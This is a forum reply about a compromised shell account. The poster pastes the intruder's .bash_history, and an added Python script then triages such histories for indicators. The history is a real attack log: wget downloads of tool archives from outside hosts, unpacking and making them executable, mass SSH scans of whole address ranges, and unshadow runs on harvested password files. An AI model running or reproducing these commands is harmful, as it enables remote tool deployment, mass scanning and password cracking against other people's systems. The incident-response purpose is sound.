Old 09-19-2008, 08:15 PM
Anon E. Muss
Guest
 
Posts: n/a
Default Re: Possible attack?

On Fri, 19 Sep 2008 17:17:13 +0000 (UTC), Sylvain Robitaille
<syl@alcor.concordia.ca> wrote:

>Anon E Muss wrote:
>
>> Below is most of output of netstat. Can someone let me know what is
>> going on here?


[...]

>Your machine is port-scanning what appears to be 218.0.0.0/11 for ssh
>servers. You need to make it stop that. If you blocked 201/8
>yesterday, and 218/8 today, you might want to try to find what data it
>gathered in the meantime for 202/8 to 217/8. More seriously, you need
>to identify the process that is performing the scan, and stop it. Then
>you need to figure out how it got there and deal with that.
>
>> ... any suggestions??
>
>Look for a probable compromise by similar means. Judging by the
>client-side ports (on your system) used in the scan, I don't think that
>a privileged account was compromised (and therefore your system itself
>is probably not compromised, unless the compromised account was able to
>use local privilege escalation). Another frequent source of account
>compromise seems to be some web-based services.


One of my users had a stupid password and had his account compromised.
Upon reviewing the logs, it looks like this was going on for about 4
days:

$ cat .bash_history

[...]
passwd
w
uname -a
cat /proc/cpuinfo
ls -a
uptime
cat /proc/cpuinfo
w
ls -a
w
uanme -a
uname -a
ls -a
w
uname -a
ps -x
w
ls -a
wget http://www12.asphost4free.com/marmy/ssh.tgz
tar zxvf ssh.tgz
rm -rf ssh.tgz
cd ssh
chmod +x *
wget http://nasa-undernet.ucoz.org/screen.tgz
tar zxvf screen.tgz
rm -rf screen.tgz
chmod +x *
screen -r
screen
../mass 117
cd ssh
../screen -r
ls -a
ps x
kill -9 12305
nano vuln.txt
ps x
ls -a
cd ..
rm -rf ssh
ls -a
w
ls -a
uname -a
cat /proc/cpuinfo
ls -a
uname -a
uptime
ps x
cat /proc/cpuinfo
ls -a
cat /proc/cpuinfo
ftp 61.184.136.12
ftp 61.184.136.12
tar zxvf webmin.tgz
cd webmin
../scan 79.15
../scan 91.80
../scan 161.53
../unshadow 161.53/
../scan 200.168
../unshadow 200.168/
../scan 201.10
../scan 202.66
../scan 92.114
../unshadow 92.114
cd
ls
cd webmin
ls
cd
wget http://www12.asphost4free.com/marmy/ssh.tgz
tar zxvf ssh.tgz
cd ssh
http://www12.asphost4free.com/mrtiger/screen.tgz
wget http://www12.asphost4free.com/mrtiger/screen.tgz
tar zxvf screen.tgz
rm -rf screen.tgz
../screen
../mass 61
../screen
w
passwd
w
uname -a
cat /proc/cpuinfo
uname -a
w
cat /proc/cpuinfo
ls -a
cd webmin
ls -a
../scan 69.13
../unshadow 69.13/
w
ls -a
cd ssh
ls -a
cat vuln.txt
cd ..
cd webmin
../scan 82.146
ls -a
cd ..
ls -a
cd ssh
ls -a
screen
w
ls -a
cd ssh
ls -a
../screen -r
screen -wipe
cat culn.txt
cat vuln.txt
ls -a
../screen
w
ls -a
cd ssh
../screen -r
cat vuln.txt
cd ssh
../screen -r
cat vuln.txt
cd ssh
cat vuln.txt
screen -r
ps x
../screen -r
../mass 62
../mass 61
cd ssh
cat vuln.txt
screen -r
../screen -r
../screen -wipe
../screen
ls -a
cd ssh
../screen -r
cat vuln.txt
../screen -r
cat vuln.txt
../mass 201
cd ssh
../screen -r
cat vuln.txt
ls +a
../screen
cd ssh
cat vuln.txt
screen -r
../screen -r
../screen -r
../screen -r
cd ..
ls -a
wget joke4u.diinoweb.com/files/Cristina.tgz
rm -rf Cristina.tgz
cd ssh
../screen -r
../mass 218
cd ssh
../screen -r
[...]

>I hope I've helped ...


You did. Thanks.

I also installed "fail2ban" as someone else advised.

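As an added example (not part of this thread and not the poster's own tooling): a small Python triage script that pulls the responder-relevant indicators out of a `.bash_history` like the one above, namely where the tools were fetched from, which archives were unpacked, which ranges the scanner was pointed at, what `unshadow` was run against, and which processes the intruder killed. The embedded sample history is a constructed excerpt modelled on the post. The reading of `mass 117` as 117.0.0.0/8 and `scan 79.15` as 79.15.0.0/16 is an assumption, since the post does not document what those binaries do with their argument.

```python
"""Triage a captured ~/.bash_history from a compromised shell account."""
import ipaddress
import re
import sys
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed sample: an abbreviated history modelled on the one in the post.
SAMPLE_HISTORY = """\
w
wget http://www12.asphost4free.com/marmy/ssh.tgz
tar zxvf ssh.tgz
rm -rf ssh.tgz
cd ssh
../mass 117
kill -9 12305
nano vuln.txt
ftp 61.184.136.12
tar zxvf webmin.tgz
../scan 79.15
../unshadow 79.15/
../mass 61
../mass 218
wget joke4u.diinoweb.com/files/Cristina.tgz
"""

DOWNLOAD_RE = re.compile(r"^\s*(?:wget|curl)\s+(\S+)")
FTP_RE = re.compile(r"^\s*ftp\s+(\S+)")
UNPACK_RE = re.compile(r"^\s*tar\s+-?\S*x\S*\s+(\S+)")
# 'mass' and 'scan' are the scanner binaries named in the post; the numeric
# argument is taken to be the leading octet(s) of the range they sweep.
SCAN_RE = re.compile(r"^\s*(?:\.{1,2}/)*(mass|scan)\s+(\d{1,3}(?:\.\d{1,3}){0,3})/?\s*$")
UNSHADOW_RE = re.compile(r"^\s*(?:\.{1,2}/)*unshadow\s+(\S+)")
KILL_RE = re.compile(r"^\s*kill\s+(?:-\S+\s+)?(\d+)")


@dataclass
class HistoryReport:
    downloads: list = field(default_factory=list)    # (line, url)
    ftp_hosts: list = field(default_factory=list)    # (line, host)
    unpacked: list = field(default_factory=list)     # (line, archive)
    scans: list = field(default_factory=list)        # (line, tool, cidr)
    cracks: list = field(default_factory=list)       # (line, unshadow target)
    killed_pids: list = field(default_factory=list)  # (line, pid)


def prefix_to_cidr(prefix: str) -> str:
    """'117' -> '117.0.0.0/8', '79.15' -> '79.15.0.0/16'.
    Assumption (the post does not document the tools): N leading octets
    mean the scanner sweeps the whole /(8*N) beneath them."""
    octets = prefix.strip("/").split(".")
    if not 1 <= len(octets) <= 4:
        raise ValueError(f"bad prefix: {prefix!r}")
    network = ".".join(octets + ["0"] * (4 - len(octets)))
    return str(ipaddress.ip_network(f"{network}/{8 * len(octets)}"))


def parse_history(text: str) -> HistoryReport:
    """Extract the intruder's externally visible actions, with line numbers."""
    report = HistoryReport()
    for lineno, line in enumerate(text.splitlines(), start=1):
        if m := DOWNLOAD_RE.match(line):
            report.downloads.append((lineno, m.group(1)))
        elif m := FTP_RE.match(line):
            report.ftp_hosts.append((lineno, m.group(1)))
        elif m := UNPACK_RE.match(line):
            report.unpacked.append((lineno, m.group(1)))
        elif m := SCAN_RE.match(line):
            report.scans.append((lineno, m.group(1), prefix_to_cidr(m.group(2))))
        elif m := UNSHADOW_RE.match(line):
            report.cracks.append((lineno, m.group(1)))
        elif m := KILL_RE.match(line):
            report.killed_pids.append((lineno, int(m.group(1))))
    return report


def scanned_ranges(report: HistoryReport) -> list:
    """Distinct target ranges, lowest first: where to look for downstream
    victims and whose abuse complaints to expect."""
    return sorted({cidr for _, _, cidr in report.scans}, key=ipaddress.ip_network)


def external_hosts(report: HistoryReport) -> list:
    """Hosts the tools came from: block at egress and grep other machines' logs."""
    hosts = set()
    for _, url in report.downloads:
        if "://" not in url:  # bare 'wget host/path', as in the post
            url = "http://" + url
        hosts.add(urlsplit(url).hostname)
    hosts.update(host for _, host in report.ftp_hosts)
    return sorted(hosts)


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_HISTORY
    report = parse_history(text)
    print("scanned ranges:", ", ".join(scanned_ranges(report)))
    print("tool sources:  ", ", ".join(external_hosts(report)))
```

Run it against the real file with `python3 triage.py /home/user/.bash_history`. Two caveats: `.bash_history` carries no timestamps unless HISTTIMEFORMAT was set, so the duration of the compromise and the login source addresses have to come from `last`/wtmp and the sshd lines in the auth log, not from this file; and because the history shows `rm -rf ssh` and two runs of `passwd`, the tool directory may already be gone and the account password changed by the intruder, so the archives listed under "unpacked" are what to look for in the download sources' logs and on other hosts. The live counterpart of this, as Sylvain said, is finding the scanning process itself (for example with `netstat -tnp` or `lsof -i`) before killing it.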